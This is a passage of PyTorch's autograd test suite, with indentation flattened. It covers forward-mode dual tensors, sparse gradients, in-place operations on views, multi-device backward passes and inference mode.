with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
self.assertIsNone(fwAD.unpack_dual(foo)[1])
self.assertIs(fwAD.unpack_dual(dual)[1], bar)
self.assertIsNone(fwAD.unpack_dual(dual)[1])
with fwAD.dual_level():
self.assertIsNone(fwAD.unpack_dual(foo)[1])
new_dual = fwAD.make_dual(foo, baz)
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual)
self.assertEqual(dual_primal, new_dual_primal)
self.assertIsNone(dual_tangent)
self.assertEqual(new_dual_tangent, baz)
def test_detach_view_tracking(self):
# Default detach is both forward and backward non-differentiable
foo = torch.rand(2)
foo_weak = torch._C._WeakTensorRef(foo)
out = foo.detach()
del foo
self.assertTrue(foo_weak.expired())
def test_out_variant(self):
with fwAD.dual_level():
foo = fwAD.make_dual(torch.rand(2), torch.rand(2))
bar = torch.rand(2)
with self.assertRaisesRegex(RuntimeError, "out= function"):
torch.add(bar, bar, out=foo)
with self.assertRaisesRegex(RuntimeError, "out= function"):
torch.add(foo, bar, out=bar)
def test_non_differentiable(self):
with fwAD.dual_level():
foo = fwAD.make_dual(torch.rand(2), torch.rand(2))
bar = torch.rand(2)
# No differentiable outputs, shouldn't error
eq = foo == bar
# Inplace
foo.eq_(bar)
def test_create_new_zeros_with_same_meta(self):
new_zeroes_fn = torch.ops.aten._new_zeros_with_same_feature_meta
def check(a, b):
def assert_same_meta(t, target):
for num_bdim in range(t.dim()):
result = new_zeroes_fn(t, target, self_num_batch_dims=num_bdim)
self.assertEqual(result.dim(), target.dim() + num_bdim)
# Check size/strides match for feature dims only
for i in range(num_bdim, result.dim()):
self.assertEqual(result.size()[i], target.size()[i - num_bdim])
self.assertEqual(result.stride()[i], target.stride()[i - num_bdim])
# Check that we generate strides reasonably
if target.is_contiguous():
self.assertTrue(result.is_contiguous())
self.assertEqual(result.storage_offset(), target.storage_offset())
prod_of_t_bdims = reduce(operator.mul, t.size()[:num_bdim], 1)
self.assertEqual(len(result.storage()), len(target.storage()) * prod_of_t_bdims)
# TensorOptions is same
self.assertEqual(result.dtype, target.dtype)
assert_same_meta(a, b)
assert_same_meta(b, a)
a = torch.randn(5, dtype=torch.float)
b = torch.randn(2, 3, 4, dtype=torch.double)
check(a, b)
# non-contiguous case
a = torch.randn(2, 3, 4).transpose(0, 1).contiguous().transpose(0, 1)
b = torch.randn(2, 3, 4)
check(a, b)
a = torch.randn(5).narrow(0, 1, 2)
b = torch.randn(2)
check(a, b)
# tensor is not a view, but still does not index entirety of storage
a = torch.randn(5).resize_(4)
b = torch.randn(4)
check(a, b)
# Zero-numel tensors
a = torch.randn(1, 0, 2)
b = torch.randn(1, 2)
check(a, b)
# Scalar tensor
a = torch.tensor(1.)
b = torch.randn(1, 2)
check(a, b)
def test_backward_graph_destruction(self):
def fn():
a = torch.rand(10, requires_grad=True)
da = fwAD.make_dual(torch.rand_like(a), a)
# Create an object with a c++ cycle as:
# db -> AutogradMeta -> ForwardGrad -> db's grad
# db's grad -> AutogradMeta -> MulBackward
# MulBackward -> SavedVariable -> db
db = da.exp()
with fwAD.dual_level():
fn()
# This test make sure that we don't deadlock on exit of this
# context manager. If you do, there is something wrong with the
# locking of the forward ad level most likely
# Generic device type autograd tests.
class TestAutogradDeviceType(TestCase):
def test_min_max_median_backprops_to_all_values(self, device):
for f in [torch.min, torch.max, torch.median, torch.nanmedian]:
x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True)
for x in [x1, x2]:
y = f(x)
y.backward()
self.assertEqual(x.grad.sum(), 1.)
self.assertEqual((x.grad == 1 / 3).sum(), 3)
def test_parameter_resize(self, device):
asd = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device))
for i in range(2):
with torch.no_grad():
asd.set_(asd[1:])
asd.grad = None
m = torch.cat((asd, asd))
m.sum().backward()
@dtypes(torch.double, torch.cdouble)
def test_sparse_ctor_getter_backward(self, device, dtype):
# See NOTE [ Sparse: autograd and API ] on the expected behavior of this test
def _test(size, sparse_dim, nnz, device):
v_size = [nnz] + list(size[sparse_dim:])
i = torch.rand(sparse_dim, nnz)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True)
other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True, device=device,
dtype=dtype)[0]
def fn(v):
x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device)
y = (x + other).coalesce()
yv = y.values()
new_v = yv.tanh()
z = torch.sparse_coo_tensor(y.indices(), new_v, y.size())
return z.coalesce().values()
gradcheck(fn, (inp,), check_batched_grad=False)
# FIXME: make gradgradcheck work.
# gradgradcheck(fn, (inp,), check_batched_grad=False)
# assert that _values is non-differentiable
with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"):
other.detach().requires_grad_()._values().backward(torch.ones_like(other._values()))
for empty_i, empty_v, empty_nnz in product([True, False], repeat=3):
sparse_size = [] if empty_i else [2, 1]
dense_size = [1, 0, 2] if empty_v else [1, 2]
nnz = 0 if empty_nnz else 5
_test(sparse_size + dense_size, len(sparse_size), nnz, device)
@skipMeta
@dtypes(torch.double, torch.cdouble)
def test_sparse_backward(self, device, dtype):
class FixedGradientFunction(Function):
@staticmethod
def forward(ctx, x, grad_x):
ctx.save_for_backward(grad_x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_grad_x, = ctx.saved_tensors
return saved_grad_x, None
size = torch.Size([6, 3, 2])
i1 = torch.tensor([
[0, 3, 4],
[0, 2, 2],
], dtype=torch.long)
v1 = make_tensor([3, 2], dtype=dtype, device=device)
sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device)
i2 = torch.tensor([
[0, 1, 3, 4],
[0, 1, 2, 2],
], dtype=torch.long)
v2 = make_tensor([4, 2], dtype=dtype, device=device)
sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device)
dense_grad = torch.rand(size, device=device, dtype=dtype)
fn = FixedGradientFunction
# sparse first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# dense first
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
# sparse only
x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
(fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
self.assertEqual(x.grad, sparse_grad1 + sparse_grad2)
# autograd tests via common_method_invocations don't allow input tensors to
# be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when
# check_sparse_nnz is set to False.)
def test_sparse_mask_autograd(self, device):
tensor = torch.randn(3, requires_grad=True, device=device)
mask = torch.ones(3, device=device)
mask[1] = 0
mask = mask.to_sparse()
converted = tensor.sparse_mask(mask).to_dense()
converted.sum().backward()
self.assertEqual(tensor.grad, mask.to_dense())
def test_pyscalar_conversions(self, device):
def _test_pyscalar_conversions(t, integral_conv):
# integral -> integral
l = t(torch.zeros(1, 1, 1, dtype=torch.long))
pyscalar = -12345
l[0] = pyscalar
self.assertEqual(integral_conv(l), pyscalar)
# floating point -> floating point
f = Variable(t(torch.randn(1, 1, dtype=torch.double)))
pyscalar = -12345.1
f[0] = pyscalar
self.assertEqual(float(f), pyscalar)
f[0] = nan
self.assertTrue(math.isnan(float(f)))
f[0] = inf
self.assertEqual(float(f), inf)
f[0] = -inf
self.assertEqual(float(f), -inf)
# integral -> floating point
# check we can convert something that loses precision
pyscalar = 1234567890123456789
self.assertNotEqual(pyscalar, integral_conv(float(pyscalar)))
l[0] = pyscalar
self.assertEqual(float(l), float(pyscalar))
# floating point -> integral
f[0] = nan
self.assertRaises(ValueError, lambda: integral_conv(f[0]))
f[0] = inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = -inf
self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
f[0] = sys.float_info.max
self.assertEqual(integral_conv(f), sys.float_info.max)
# bool, nonzero
def test_nonzero(tensor, value, expected):
tensor[0] = value
self.assertEqual(expected, bool(tensor))
self.assertEqual(expected, True if tensor else False)
test_nonzero(l, 0, False)
test_nonzero(l, -2, True)
test_nonzero(f, 0.0, False)
test_nonzero(f, sys.float_info.min, True)
test_nonzero(f, nan, bool(nan))
test_nonzero(f, inf, bool(inf))
test_nonzero(f, -inf, bool(-inf))
_test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x))
@dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
@dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
def test_set_requires_grad_only_for_floats(self, device, dtype):
def f1():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad_()
def f2():
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = True
def f3():
torch.ones(1, dtype=dtype, device=device, requires_grad=True)
a = torch.ones(1, dtype=dtype, device=device)
a.requires_grad = False # should always work
a.requires_grad_(False)
for f in [f1, f2, f3]:
if dtype.is_floating_point:
f()
else:
with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)):
f()
@onlyCUDA
def test_advanced_indexing_backwards_large(self, device):
# See https://github.com/pytorch/pytorch/issues/22843
n = (1 << 16)
x = torch.rand(n, 1, device=device, requires_grad=True)
a = x[:, [0]]
a.sum().backward()
self.assertEqual(x.grad, torch.ones(n, 1, device=device))
def test_advanced_indexing_backwards_memory_format(self, device):
# See https://github.com/pytorch/pytorch/issues/36956
shape = (2, 8, 1, 2)
i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last)
x = torch.randn(shape, requires_grad=True, device=device)
x[i].sum().backward()
def _test_reentrant_parent_error_on_cpu(self, device):
t1 = torch.rand([3, 3], requires_grad=True)
t2 = torch.rand([3, 3], device=device, requires_grad=True)
t3 = torch.rand([3, 3], device=device, requires_grad=True)
# Parent graph cpu graph.
t4 = t1 * t1
t5 = TestAutograd.SimulateBackwardError.apply(t4)
# Child gpu graph (much longer than parent graph).
prev = t2 * t2
for i in range(10):
prev = prev * t2
reentrant_root = prev
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will take much longer.
reentrant_root.backward()
return grad
# Parent gpu graph.
t6 = ReentrantFunc.apply(t3)
t7 = t6 * t6
# Parent graph will error out first, while child graph will continue executing.
with self.assertRaisesRegex(Exception, "Simulate error"):
torch.autograd.backward([t5.sum(), t7.sum()])
# No grads should be accumulated since child graph will stop execution
# after parent receives error.
self.assertIsNone(t2.grad)
self.assertIsNone(t1.grad)
self.assertIsNone(t3.grad)
@onlyCUDA
def test_reentrant_parent_error_on_cpu(self, device):
def _get_cuda_memory_usage():
# we don't need CUDA synchronize because the statistics are not tracked at
# actual freeing, but at when marking the block as free.
num_devices = torch.cuda.device_count()
gc.collect()
return tuple(torch.cuda.memory_allocated(i) for i in range(num_devices))
before = _get_cuda_memory_usage()
# Run as separate function so that gc can clean up everything when we
# check for memory usage.
self._test_reentrant_parent_error_on_cpu(device)
# Wait for autograd thread to cleanup failed tasks.
after = _get_cuda_memory_usage()
start = time.time()
while before != after and time.time() - start < 30:
time.sleep(0.1)
after = _get_cuda_memory_usage()
self.assertEqual(before, after)
# TODO: see if these tests can be ported to OpInfos or moved to where's test suite
def test_where_functional(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where(cond, x, y):
return torch.where(cond, x, y)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, device=device)])
x = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, 5, device=device)])
def test_where_scalar(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
scalar = 4.
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where_scalar_first(cond, x):
return torch.where(cond, scalar, x)
def where_scalar_second(cond, x):
return torch.where(cond, x, scalar)
gradcheck(where_scalar_first, (cond, x))
gradgradcheck(where_scalar_first, (cond, x))
gradcheck(where_scalar_second, (cond, x))
gradgradcheck(where_scalar_second, (cond, x))
@onlyCUDA
def test_free_unneeded_tensor(self, device):
x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True)
m = torch.randn(1, 3, 1, 1, device=device)
z = x.sum()
base_mem = torch.cuda.memory_allocated()
z = ((x + 2) * m).sum()
end_mem = torch.cuda.memory_allocated()
# In the end the memory usage should remain equal, because neither of
# (x + 2) and ((x + 2) * m) should be kept alive for backward, while the
# previous allocation of z had the same size as the current one.
self.assertEqual(base_mem, end_mem)
@onlyCUDA
def test_pin_memory(self, device):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
self.assertEqual(x, x.pin_memory())
self.assertIsNot(x, x.pin_memory())
self.assertTrue(x.pin_memory().requires_grad)
gradcheck(lambda x: x.pin_memory(), [x])
gradgradcheck(lambda x: x.pin_memory(), [x])
@skipCUDAIfRocm
@onlyCUDA
def test_profiler_emit_nvtx(self, device):
# This test is not intended to ensure correctness of nvtx ranges.
# That would require something a great deal more complex (you'd have to create a
# profile in a subprocess, open it, and parse the sql somehow).
# This test is merely intended to catch if emit_nvtx breaks on construction.
a = torch.tensor([1, 2, 3], dtype=torch.float32, device=device)
with torch.cuda.profiler.profile():
with emit_nvtx():
a.add(1.0)
@onlyCUDA
def test_rnn_backward_to_input_but_not_parameters(self, device):
# this checks whether it is possible to not require
# weight parameters, but require inputs, see #7722
l = torch.nn.LSTM(2, 3).to(device)
for p in l.parameters():
p.requires_grad = False
s = torch.randn(1, 1, 2, requires_grad=True, device=device)
out, _ = l(s)
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
@deviceCountAtLeast(1)
def test_grad_assignment(self, devices):
x = torch.randn(5, 5, device=devices[0])
# Tests that the wrong type raises
with self.assertRaisesRegex(TypeError, "expected to be a Tensor or None"):
x.grad = 0
# Tests that the wrong shape raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(2, 2, device=devices[0])
# Tests that the wrong dtype raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, dtype=torch.long, device=devices[0])
# Tests that self-assignment raises
with self.assertRaises(RuntimeError):
x.grad = x
# Tests device -> cpu grad assignment raises
if self.device_type != 'cpu':
with self.assertRaises(RuntimeError):
t_cpu = torch.rand(5, 5)
t_cpu.grad = torch.randn(5, 5, device=devices[0])
# Tests half type on CUDA
if self.device_type == 'cuda':
x = x.to(dtype=torch.half, device=devices[0])
x.grad = torch.zeros_like(x)
# Tests cross-device assignment raises
if len(devices) > 1:
x = torch.randn(5, 5, device=devices[0])
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, device=devices[1])
@deviceCountAtLeast(1)
@dtypes(torch.float, torch.double)
def test_requires_grad_factory(self, devices, dtype):
fns = [torch.ones_like, torch.randn_like]
x = torch.randn(2, 3, dtype=dtype, device=devices[0])
for fn in fns:
for requires_grad in [True, False]:
output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad)
self.assertEqual(requires_grad, output.requires_grad)
self.assertIs(dtype, output.dtype)
self.assertEqual(devices[0], str(x.device))
@deviceCountAtLeast(2)
def test_unused_output_device(self, devices):
from torch.nn.parallel._functions import Broadcast
x = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True)
outputs = Broadcast.apply(list(range(len(devices))), x)
y = outputs[-1] * 2
y.sum().backward()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(x.grad, torch.ones(5, 5) * 2)
@deviceCountAtLeast(2)
def test_backward_device(self, devices):
# check that current device matches the variable's device
device = [None]
class Identity(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.clone()
@staticmethod
def backward(ctx, grad_output):
device[0] = grad_output.device
return grad_output.clone()
v = torch.randn(1, device=devices[1], requires_grad=True)
Identity.apply(v).backward()
self.assertEqual(str(device[0]), devices[1])
@deviceCountAtLeast(2)
def test_inputbuffer_add_multidevice(self, devices):
input = torch.randn(1, device=devices[0], requires_grad=True)
output = input.to(device=devices[1]) + input.to(device=devices[1])
output.backward()
@onlyCPU
def test_copy_(self, device):
# At the time of writing this test, copy_ is not generated from native_functions.yaml
# there was a bug that bfloat16 was not recognized as floating.
x = torch.randn(10, device=device, requires_grad=True)
floating_dt = [dt for dt in get_all_dtypes() if dt.is_floating_point]
for dt in floating_dt:
y = torch.empty(10, device=device, dtype=dt)
y.copy_(x)
self.assertTrue(y.requires_grad)
z = x.to(torch.bfloat16)
self.assertTrue(z.requires_grad)
def test_copy_forward_ad_broadcasting(self, device):
# copy_ allows the src to have a different shape from self as long as src is
# broadcastable to self. Make sure forward AD handles this case.
primal = torch.rand(3, 3, device=device)
tangent = torch.rand(3, 3, device=device)
non_dual = torch.rand(1, 3, 3, device=device)
with fwAD.dual_level():
dual = fwAD.make_dual(primal, tangent)
non_dual.copy_(dual)
@onlyCUDA
def test_simple_reentrant_cross_device(self, device):
class ReentrantFunc(Function):
_cpu_mode = True
@staticmethod
def forward(ctx, x):
return x * (x + 2)
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
if ReentrantFunc._cpu_mode:
new_param = torch.randn(2, 2, requires_grad=True)
(new_param ** 2).sum().backward()
else:
new_param = torch.randn(2, 2, device=device, requires_grad=True)
(new_param ** 2).sum().backward()
return grad_output
# Reentrant starts on GPU thread, finishs on GPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on CPU thread, finishs on GPU thread
x = torch.randn(2, 2, requires_grad=True)
# set ReentrantFunc node to GPU to emit tasks to GPU queue
ReentrantFunc._cpu_mode = False
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on GPU thread, finishs on CPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
# set ReentrantFunc node to CPU to emit tasks to CPU queue
ReentrantFunc._cpu_mode = True
out = ReentrantFunc.apply(x)
out.sum().backward()
@onlyCUDA
def test_cross_device_reentrant_autograd(self, device):
# Output on gpu so that this task will be associated with the gpu thread
def fn_on_gpu(inp):
# Artificially increase the priority of the next op to make sure it runs
# as soon as we reach it before the ops of branch1.
dummy = inp * 2 * 2 * 2 * 2
return inp.to(device=device)
def parent_on_cpu(inp):
# Slow branch of ops on gpu so that the work queue for the gpu thread
# won't empty too quickly. They also have smaller priorities than the
# ones created by fn_on_gpu
branch1 = inp.to(device=device)
branch1 = branch1 / branch1
branch1 = branch1 / branch1
branch1 = branch1 / branch1
# Perform checkpoint on cpu tensors. So the last op performed in the reentrant
# autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread.
# So the cpu thread will notify the gpu thread with an empty NodeTask.
branch2 = checkpoint(fn_on_gpu, inp)
out = branch2 + branch1
return out
inp = torch.rand(2, requires_grad=True)
out = parent_on_cpu(inp)
# This will segfault if the empty NodeTask is not handled properly in the
# gpu thread ReadyQueue
out.sum().backward()
def test_inplace_on_view_backprop_base(self, device):
# modify view and back-prop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v1.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [1, 1]])
def test_inplace_on_view_backprop_view_of_view(self, device):
# modify view and backprop through view-of-view
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = x.narrow(0, 0, 1)
v1.mul_(2)
v2.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [0, 0]])
def test_inplace_on_view_of_view(self, device):
# modify view-of-view and backprop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1]])
def test_inplace_on_view_then_no_grad(self, device):
# Perform an in-place operation on a view of a non-leaf variable.
a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True)
b = a * 2
c = b.view_as(b)
c[0][0] = 3
# Force a graph update with grad disabled.
with torch.no_grad():
c.grad_fn
c.sum().backward()
def test_inplace_on_view_gradcheck(self, device):
# gradcheck modifications to views
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
x.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b)
x.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_multiple_outputs(self, device):
root = torch.arange(9., dtype=torch.double).reshape(3, 3).requires_grad_()
x = root.clone()
v1 = x.unbind()
with self.assertRaises(RuntimeError):
v1[0].mul_(2)
def test_inplace_on_view_of_multiple_output_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.unbind(0)
c = b[0].view_as(b[0])
with self.assertRaises(RuntimeError):
c.mul_(2)
def test_inplace_multiple_output_view_of_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.view_as(a)
c = b.unbind(0)
with self.assertRaises(RuntimeError):
c[0].mul_(2)
def test_inplace_on_view_makes_base_require_grad(self, device):
# in-place modification to view makes base require grad
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False)
b = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
self.assertFalse(x.requires_grad)
x.narrow(1, 2, 2).mul_(b)
self.assertTrue(x.requires_grad)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_backprop_view(self, device):
# modify view and backprop through view
a = torch.tensor([2., 5.], device=device, requires_grad=False)
b = torch.tensor([3.], device=device, requires_grad=True)
res = a.narrow(0, 1, 1).mul_(b)
res.sum().backward()
self.assertEqual(b.grad.tolist(), [5])
self.assertIsNone(a.grad)
def test_inplace_on_view_modify_base(self, device):
# Test that an in-place operation on a base that forced it to require
# grad also forces any previous views to require grad and backprop
# correctly
r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True)
def fn(r):
x = torch.ones(5, dtype=torch.double, device=device)
v = x.select(0, 1)
self.assertFalse(v.requires_grad)
self.assertIsNone(v.grad_fn)
x.add_(r) # v is now dependent on r due to the in-place op on x
self.assertTrue(v.requires_grad)
return v
gradcheck(fn, [r])
gradgradcheck(fn, [r])
def test_inplace_on_view_python(self, device):
# in-place modifications of Python-autograd created view
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
class PyAdd(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y):
ctx.mark_dirty(x)
x.add_(y)
return x
@staticmethod
def backward(ctx, grad):
return grad, grad
def func(root, b):
x = root.clone()
PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b)
PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_non_contig(self, device):
root = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1], [1, 1]])
def test_inplace_on_view_multi_output_unsafe(self, device):
for f in [lambda t: t.unsafe_split(1),
lambda t: t.unsafe_split_with_sizes((1, 1, 1)),
lambda t: t.unsafe_chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
s1.mul_(s2)
s1.sum().backward()
def test_inplace_on_view_multi_output_safe(self, device):
for f in [lambda t: t.split(1),
lambda t: t.split_with_sizes((1, 1, 1)),
lambda t: t.chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
error_msg = 'This view is the output of a function that returns multiple views.'
with self.assertRaisesRegex(RuntimeError, error_msg):
s1.mul_(s2)
def test_mv_grad_stride_0(self, device):
# Reference: https://github.com/pytorch/pytorch/issues/38315
mat = torch.randn(2, 2, dtype=torch.double, device=device)
vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True)
def fn(vec):
# Expand inside the function to make sure the input to
# gradcheck does not have overlapping memory
vec = vec.expand(2)
return (mat @ vec).sum()
gradcheck(fn, (vec))
gradgradcheck(fn, (vec))
@onlyCUDA
def test_gradcheck_input_output_different_device(self, device):
x = torch.ones((1,), dtype=torch.double, device="cuda", requires_grad=True)
gradcheck(lambda x: x.to("cpu"), (x,))
x = torch.ones((1,), dtype=torch.double, device="cpu", requires_grad=True)
gradcheck(lambda x: x.to("cuda"), (x,))
def test_strided_leaf_grad_layout(self, device):
# (1) If leaf is non-overlapping and dense, grad's layout should match its leaf.
for fmt_a in (torch.contiguous_format, torch.channels_last):
for fmt_b in (torch.contiguous_format, torch.channels_last):
a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a)
b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b)
a.requires_grad_()
b.requires_grad_()
# checks (1) for broadcasted gradients
a.sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
b.sum().backward()
self.assertEqual(b.grad.stride(), b.stride())
# checks (1) for non-broadcasted gradients
a.grad = None
b.grad = None
(a * b).sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
self.assertEqual(b.grad.stride(), b.stride())
# (2) If leaf isn't dense, checks that grads are rowmajor contiguous.
c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device))
c.requires_grad_()
d = torch.rand((2, 2), device=device)
# checks (2) for broadcasted gradients
c.sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# checks (2) for non-broadcasted gradients
c.grad = None
(c * d).sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
def test_copy_r_to_c(self, device):
out_c = torch.empty(3, 2, dtype=torch.cdouble, device=device)
inp_r = torch.randn(3, 2, dtype=torch.double, device=device,
requires_grad=True)
def do_test():
out_c.copy_(inp_r)
out_c.sum().backward()
self.assertEqual(inp_r.grad, torch.ones_like(inp_r))
self.assertNotWarn(do_test)
def test_non_differentiable_ops(self, device):
# Just make sure the op doesn't raise an error
# and resulting tensor has requires_grad=False.
x = torch.tensor([[1, 2], [3, 4.]], requires_grad=True, device=device)
out = torch.isin(x, torch.tensor([2, 3], device=device))
self.assertFalse(out.requires_grad)
x = torch.randn(3, 3, requires_grad=True)
out = torch.signbit(x)
self.assertFalse(out.requires_grad)
def test_warning_in_backward(self, device):
# Test warning during backward are always propagated as python warnings (gh-50209)
# NOTE: For device=cuda, warning gets propagated from a worker thread
a = torch.zeros((), device=device, requires_grad=True)
b = torch._C._nn._test_warn_in_autograd(a)
with self.assertWarnsRegex(UserWarning, "Warn from backward"):
b.backward()
class TestAutogradInferenceMode(TestCase):
def _is_inference_tensor(self, tensor):
try:
err_msg = "Inference tensors do not track version counter"
with self.assertRaisesRegex(RuntimeError, err_msg):
tensor._version
return True
except AssertionError as e:
return False
def test_inference_mode_context_manager(self):
self.assertFalse(torch.is_inference_mode_enabled())
with torch.inference_mode():
self.assertTrue(torch.is_inference_mode_enabled())
with torch.inference_mode(False):
self.assertFalse(torch.is_inference_mode_enabled())
self.assertTrue(torch.is_inference_mode_enabled())
self.assertFalse(torch.is_inference_mode_enabled())
def test_inference_mode_decorator(self):
for mode in (True, False):
@torch.inference_mode(mode)
def func(x):
self.assertEqual(torch.is_inference_mode_enabled(), mode)
return x * x
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
d = func(c)
self.assertTrue(not mode or torch.is_inference(d))
self.assertEqual(d.requires_grad, requires_grad and not mode)
def test_inference_mode_tensor_creation(self):
with torch.inference_mode():
# new tensors created through constructors are inference tensors
c = torch.ones(1, 2, 3)
self.assertFalse(c.requires_grad)
self.assertTrue(torch.is_inference(c))
# requires_grad doesn't change inference tensor behavior in InferenceMode
tmp = torch.ones(1, 2, 3, requires_grad=True)
self.assertTrue(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
tmp = torch.ones(1, 2, 3).requires_grad_(False)
self.assertFalse(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
def test_inference_mode_existing_autograd_session(self):
s = torch.ones(1, 2, 3, requires_grad=True)
a = s.clone()
# `a` gets saved outside of inference mode
out = a * a
